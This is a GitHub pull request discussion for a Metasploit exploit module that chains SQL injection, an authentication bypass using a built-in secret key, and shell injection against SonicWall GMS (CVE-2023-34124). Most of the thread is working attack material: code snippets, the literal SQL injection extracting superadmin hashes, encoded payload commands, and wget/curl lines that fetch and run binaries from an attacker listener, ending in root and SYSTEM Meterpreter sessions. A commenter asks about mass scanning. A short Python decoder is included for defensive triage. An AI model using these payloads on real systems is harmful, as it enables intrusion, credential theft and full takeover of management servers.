
Sonicwall rce CVE-2023-34124 #18302

Merged

Conversation

rbowes-r7
Contributor

Add a module for a remote code execution issue in SonicWall GMS. This works by exploiting several different issues fixed in the same patch, culminating in shell injection. One of the biggest difficulties was getting past their XSS filter, which takes exception to a lot of special characters. Both the Windows and Linux versions should be able to encode/run any command that's not too long.

Verification

The affected software is SonicWall GMS 9.3.9320 (and likely earlier). The first patched version is 9.3.9330. They should be available in the "vulnerable software" folder, but need to be linked to a (free) SonicWall account + demo license. I documented how to get those going in the documentation/ entry.

This should work against both the Windows version (which is a .exe installer), and a Linux version (which is a VM appliance, which, AFAICT, they don't give you a login for, or at least not one I could find).

Once the software is installed:

  1. Start msfconsole
  2. Do use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124
  3. Set the appropriate TARGET, RHOST, LHOST, and possibly FETCH_SRVHOST (for Windows)
  4. Do run
  5. You should get meterpreter

Happy to help with running the software or testing the modules!

@rbowes-r7
Contributor Author

Thanks for having a look, @jvoisin! I think I've addressed everything you suggested!

@smcintyre-r7 smcintyre-r7 added module rn-modules release notes for new or majorly enhanced modules docs labels Aug 23, 2023
@eyes-of-ice

Has anyone come up with any checker/mass scanner for this?
Or can the exploit itself be used that way?

@cdelafuente-r7 cdelafuente-r7 self-assigned this Aug 28, 2023
Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment


Thanks @rbowes-r7 for this great module! I left a few minor comments and suggestions before it lands. I tested version 9.3.9320 and it works great on both Linux and Windows. Thank you for helping me with the software installation.

# If there's no ':' in the response, something super weird happened
fail_with(Failure::UnexpectedReply, 'SQL injection returned the wrong value: no username or hash') if !hash.include?(':')

username, hash = hash.split(/:/, 2)
Contributor


I don't think regex is needed here. A simple character will avoid unnecessary regex processing.

Suggested change
username, hash = hash.split(/:/, 2)
username, hash = hash.split(':', 2)

when :cmd
my_payload = payload.encoded
when :dropper
my_payload = generate_payload_exe(code: payload.encoded)
Contributor


It looks like payload.encoded is the default payload in generate_payload_exe.

pl = opts[:code]
pl ||= payload.encoded

Suggested change
my_payload = generate_payload_exe(code: payload.encoded)
my_payload = generate_payload_exe

'==== | uudecode;',

# Run in the background with coproc
"coproc #{Shellwords.escape(payload_file)};",
Contributor


I was surprised this works for both ELF and shell script, since execute_command_linux can receive an executable as raw binary or a shell script. If a shell script is received, the resulting temporary file created on the target will be a text file containing the command without shebang line. Since it is chmod'ed as executable, the parent shell seems to guess it is a shell script and execute it with /bin/sh. That's cool!

Contributor Author


Yup! Super handy, thanks Linux!

I could maybe do "bash " to be safe, but /shrug

Comment on lines 76 to 77
'PAYLOAD' => 'cmd/unix/generic',
'DisablePayloadHandler' => true
Contributor


I'm wondering if there is any reason to disable the payload handler?
On my test environment (Linux VM Appliance with SonicWall GMS 9.3.9320), wget is available, which let me use a fetch payload:

msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set payload payload/cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set DisablePayloadHandler false
DisablePayloadHandler => false
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit rhosts=192.168.100.43 lhost=192.168.100.19 verbose=true fetch_srvhost=192.168.100.19 fetch_command=WGET

[*] Command to run on remote host: wget -qO ./QhmRCknzxk http://192.168.100.19:8080/aWXHuJn0-w7Npfyk2zEaeQ; chmod +x ./QhmRCknzxk; ./QhmRCknzxk &
[*] Fetch Handler listening on 192.168.100.19:8080
[*] HTTP server started
[*] Adding resource /aWXHuJn0-w7Npfyk2zEaeQ
[*] Started reverse TCP handler on 192.168.100.19:4444
[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
[*] Grabbing server hashing token...
[*] Got the server-side token: 92398446593864970646036091413420
[*] Generated client token: 611e94991eef3d3bb5e586070836a7a8
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[*] Encoding (Linux) payload
[*] Encoded shell command: bash -c PLUS\=\$\(echo\ -e\ begin-base64\ 755\ a\\\\nKwee\\\\n\=\=\=\=\ \|\ uudecode\ -o-\)\;echo\ -e\ begin-base64\ 755\ /tmp/.wlwfbnum\\\\nd2dldCAtc8gLi9RaG1S2tuenhrIGhdHA6Ly8xOIuMTY4LjEMTk6ODA4MC9hV1pFYWVROyBaG1vZCAreCAus7IC4vUWhtUkNbnpm\\\\n\=\=\=\=\ \|\ uudecode\;coproc\ /tmp/.wlwfbnum\;rm\ /tmp/.wlwfbnum
[*] Attempting to execute the shell injection payload
[*] Client 192.168.100.43 requested /aWXHuJn0-w7Npfyk2zEaeQ
[*] Sending payload to 192.168.100.43 (Wget/1.21.3)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.100.43
[+] Payload sent!
[*] Meterpreter session 7 opened (192.168.100.19:4444 -> 192.168.100.43:55231) at 2023-08-31 11:30:00 +0200

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : gms.example.com
OS           :  (Linux 3.18.44-snwl-VMWare-x64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > [*] Shutting down Meterpreter...


[*] Attempting to execute the shell injection payload
[+] Payload sent!
[*] Exploit completed, but no session was created.
What could be the reason for this?

Contributor


There could be a lot of reasons for this. This can be an AV running on the target that blocks the payload execution, the software is patched and not vulnerable anymore, the payload simply needs some local tool to run properly (e.g. wget, curl, etc.), the handler is not running on the Metasploit side, a firewall is blocking somewhere, etc.

Please, can you give more details?


Hi,
thank you for answering.
What detail is needed, so I can give it?
I run the exploit,
give it the lhost, rhost;
it works fine till the end, which gives no session.


[*] Command to run on remote host: wget -qO ./SfaBnzTq http://192.168.100.120:8080/_Ysce7IWY9BXUC2Go0wjXg; chmod +x ./SfaBnzTq; ./SfaBnzTq &
[*] Fetch Handler listening on 192.168.100.120:8080
[*] HTTP server started
[*] Adding resource /_Ysce7IWY9BXUC2Go0wjXg
[*] Started reverse TCP handler on 192.168.100.120:4444
[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:4e91d12e61259fed5d485f38e71da4be
[*] Grabbing server hashing token...
[*] Got the server-side token: 08178100102648407989985416008201
[*] Generated client token: 5f33490baf0bed3a8c3061e3b879e334
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[*] Encoding (Linux) payload
[*] Encoded shell command: bash -c PLUS=$(echo\ -e\ begin-base64\ 755\ a\\nKwee\\n====\ |\ uudecode\ -o-);echo\ -e\ begin-base64\ 755\ /tmp/.lcsqpuat\\nd2dldCAtcU8gLi9TZmFCbnpUcSBodHRwOi8vMTkyLjE2OC4xMDAuMTIwOjgwODAvX1lzY2U3SVdZOUJYVUMyR28wd2pYZzsgY2htb2QgK3ggLi9TZmFCbnpUcTsgLi9TZmFCbnpUcSAm\\n====\ |\ uudecode\ ;\ coproc\ /tmp/.lcsqpuat\ ;\ rm\ /tmp/.lcsqpuat
[*] Attempting to execute the shell injection payload
[+] Payload sent!
[*] Exploit completed, but no session was created.
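
An added triage example, not code from the module or from anyone in this thread: it decodes the uudecode/base64 stanzas in a captured command line like the encoded shell command just above and reports which file would be written to disk, whether that file is an ELF binary or a script, and whether it is started with coproc and then deleted, which is what a defender wants to know when such a line turns up in process telemetry. Both inputs are constructed: the first reuses the base64 body from the output above exactly as printed there, the second is a made-up ELF stub in the doubly-escaped form the dropper target prints; reading ${PLUS} as a literal '+' is an assumption (the helper stanza named a decodes to that character).

```python
import base64
import re
from dataclasses import dataclass

# Constructed sample 1: the encoded command from the log above, copied as
# printed there; its base64 body decodes to the wget/chmod/run one-liner.
SAMPLE_FETCH = (
    r"bash -c PLUS=$(echo\ -e\ begin-base64\ 755\ a\\nKwee\\n====\ |\ uudecode\ -o-);"
    r"echo\ -e\ begin-base64\ 755\ /tmp/.lcsqpuat\\n"
    "d2dldCAtcU8gLi9TZmFCbnpUcSBodHRwOi8vMTkyLjE2OC4xMDAuMTIwOjgwODAvX1lzY2U3SVdZ"
    "OUJYVUMyR28wd2pYZzsgY2htb2QgK3ggLi9TZmFCbnpUcTsgLi9TZmFCbnpUcSAm"
    r"\\n====\ |\ uudecode\ ;\ coproc\ /tmp/.lcsqpuat\ ;\ rm\ /tmp/.lcsqpuat"
)
# Constructed sample 2: the doubly-escaped shape of the dropper log, carrying
# a made-up 6-byte ELF stub whose base64 ('f0VMRgI+') needs the PLUS variable.
SAMPLE_DROPPER = (
    r"bash -c PLUS\=\$\(echo\ -e\ begin-base64\ 755\ a\\\\nKwee\\\\n\=\=\=\=\ \|\ "
    r"uudecode\ -o-\)\;echo\ -e\ begin-base64\ 755\ /tmp/.example\\\\nf0VMRgI\$\{PLUS\}"
    r"\\\\n\=\=\=\=\ \|\ uudecode\;coproc\ /tmp/.example\;rm\ /tmp/.example"
)
STANZA = re.compile(r"begin-base64 (\d+) (\S+)\n(.*?)\n====", re.S)  # header, body, '===='


@dataclass
class Stanza:
    mode: str
    path: str
    data: bytes


def shell_unescape(cmdline: str) -> str:
    """Undo backslash escaping (present when spaces are escaped), then expand
    the \\n sequences that 'echo -e' would turn into newlines."""
    if "\\ " in cmdline:
        cmdline = re.sub(r"\\(.)", r"\1", cmdline)
    return re.sub(r"\\+n", "\n", cmdline)


def extract_stanzas(cmdline: str) -> list:
    """Every uudecode stanza with its body decoded; '${PLUS}' is read as '+'
    (assumption: the helper stanza named 'a' decodes to that character)."""
    out = []
    for mode, path, body in STANZA.findall(shell_unescape(cmdline)):
        body = body.replace("${PLUS}", "+").strip()
        body += "=" * (-len(body) % 4)  # restore stripped base64 padding
        out.append(Stanza(mode, path, base64.b64decode(body)))
    return out


def triage(cmdline: str) -> dict:
    """Summarise what the command would do on the host; {} if no stanza is found."""
    plain = shell_unescape(cmdline)
    drops = [s for s in extract_stanzas(cmdline) if s.path != "a"]  # 'a' goes to stdout (-o-)
    if not drops:
        return {}
    elf = [s.data.startswith(b"\x7fELF") for s in drops]
    return {
        "paths": [s.path for s in drops],
        "kinds": ["elf" if e else "script" for e in elf],
        "backgrounded": any(f"coproc {s.path}" in plain for s in drops),
        "self_deleting": any(f"rm {s.path}" in plain for s in drops),
        "script_text": [s.data.decode("utf-8", "replace") for s, e in zip(drops, elf) if not e],
    }
```

For the fetch sample the decoded script is the same wget/chmod/run line the module printed as "Command to run on remote host", so the two log lines can be cross-checked against each other.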

Contributor Author


Re: the original thing, I figured generic/command wouldn't necessarily want a handler. I don't feel strongly, though, so I went ahead and removed that.

@cdelafuente-r7
Contributor

Thanks @rbowes-r7 ! Everything looks good to me now. I tested against version 9.3.9320 on Linux and Windows and verified I got a session. I'll go ahead and land it.

Example output

Linux

  • target 0 (dropper)
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit rhosts=192.168.100.43 lhost=192.168.100.7 verbose=true

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Validating SonicWall GMS is running on URI: /
[!] The service is running, but could not be validated. Running: SonicWall Universal Management Suite v9.3
[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
[*] Grabbing server hashing token...
[*] Got the server-side token: 87928145654401867812285498292269
[*] Generated client token: a4dbf3434867fd7de6218ffdc684a0e5
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[*] Encoding (Linux) payload
[*] Encoded shell command: bash -c PLUS\=\$\(echo\ -e\ begin-base64\ 755\ a\\\\nKwee\\\\n\=\=\=\=\ \|\ uudecode\ -o-\)\;echo\ -e\ begin-base64\ 755\ /tmp/.podezfld\\\\nf0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA\$\{PLUS\}gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCoAQdRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp\$\{PLUS\}Wg8FSIXAeO3/5g\=\=\\\\n\=\=\=\=\ \|\ uudecode\;coproc\ /tmp/.podezfld\;rm\ /tmp/.podezfld
[*] Attempting to execute the shell injection payload
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.100.43
[+] Payload sent!
[*] Meterpreter session 1 opened (192.168.100.7:4444 -> 192.168.100.43:48965) at 2023-09-08 11:40:28 +0200

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : gms.example.com
OS           :  (Linux 3.18.44-snwl-VMWare-x64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

  • target 2 (cmd) - fetch payload
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set target 2
target => 2
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set payload payload/cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit rhosts=192.168.100.43 lhost=192.168.100.7 verbose=true fetch_srvhost=192.168.100.7 fetch_command=WGET

[*] Command to run on remote host: wget -qO ./EoMFMgUZoX http://192.168.100.7:8080/MUbUZmtesJZBaBhmgETerw; chmod +x ./EoMFMgUZoX; ./EoMFMgUZoX &
[*] Fetch Handler listening on 192.168.100.7:8080
[*] HTTP server started
[*] Adding resource /MUbUZmtesJZBaBhmgETerw
[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Validating SonicWall GMS is running on URI: /
[!] The service is running, but could not be validated. Running: SonicWall Universal Management Suite v9.3
[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
[*] Grabbing server hashing token...
[*] Got the server-side token: 81832218319038994079518896558102
[*] Generated client token: 6b969cff849b8a6c60037ac9cbcbf076
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[*] Encoding (Linux) payload
[*] Encoded shell command: bash -c PLUS\=\$\(echo\ -e\ begin-base64\ 755\ a\\\\nKwee\\\\n\=\=\=\=\ \|\ uudecode\ -o-\)\;echo\ -e\ begin-base64\ 755\ /tmp/.nrqnacpl\\\\nd2dldCAtcU8gLi9Fb01GTWdVWm9YIGh0dHA6Ly8xOTIuMTY4LjEuNzo4MDgwL01VYlVabXRlc0paQmFCaG1nRVRlcnc7IGNobW9kICt4IC4vRW9NRk1nVVpvWDsgLi9Fb01GTWdVWm9YICY\=\\\\n\=\=\=\=\ \|\ uudecode\;coproc\ /tmp/.nrqnacpl\;rm\ /tmp/.nrqnacpl
[*] Attempting to execute the shell injection payload
[*] Client 192.168.100.43 requested /MUbUZmtesJZBaBhmgETerw
[*] Sending payload to 192.168.100.43 (Wget/1.21.3)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.100.43
[+] Payload sent!
[*] Meterpreter session 2 opened (192.168.100.7:4444 -> 192.168.100.43:48979) at 2023-09-08 11:42:18 +0200

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : gms.example.com
OS           :  (Linux 3.18.44-snwl-VMWare-x64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Windows

  • target 1 (command) - fetch payload
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set target 1
target => 1
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set payload payload/cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit rhosts=192.168.100.234 lhost=192.168.100.1 verbose=true fetch_srvhost=192.168.100.1

[*] Command to run on remote host: curl -so BoGmcbWnFkVL.exe http://192.168.100.1:8080/Qy-qOX10kZIXJGk3Q336Lg & start /B BoGmcbWnFkVL.exe
[*] Fetch Handler listening on 192.168.100.1:8080
[*] HTTP server started
[*] Adding resource /Qy-qOX10kZIXJGk3Q336Lg
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Validating SonicWall GMS is running on URI: /
[!] The service is running, but could not be validated. Running: SonicWall Universal Management Suite v9.3
[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
[*] Grabbing server hashing token...
[*] Got the server-side token: 00887156092946634253255096193522
[*] Generated client token: 530e7a3a16a3409c0642ae81d34c2325
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Windows detected!)
[*] Encoding (Windows) command: curl -so BoGmcbWnFkVL.exe http://192.168.100.1:8080/Qy-qOX10kZIXJGk3Q336Lg & start /B BoGmcbWnFkVL.exe
[*] Running shell command: cmd.exe /c curl -so BoGmcbWnFkVL.exe http://192.168.100.1:8080/Qy-qOX10kZIXJGk3Q336Lg "&" start /B BoGmcbWnFkVL.exe
[*] Client 192.168.100.234 requested /Qy-qOX10kZIXJGk3Q336Lg
[*] Sending payload to 192.168.100.234 (curl/7.83.1)
[*] Sending stage (200774 bytes) to 192.168.100.234
[+] Payload sent!
[*] Meterpreter session 3 opened (192.168.100.1:4444 -> 192.168.100.234:50548) at 2023-09-08 11:44:57 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN2019
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows

@cdelafuente-r7 cdelafuente-r7 merged commit a33f03d into rapid7:master Sep 8, 2023
34 checks passed
@cdelafuente-r7
Contributor

Release Notes

This adds an exploit module that leverages a remote code execution in SonicWall GMS. Version 9.3.9320 (and likely earlier) is affected by this vulnerability identified as CVE-2023-34124.
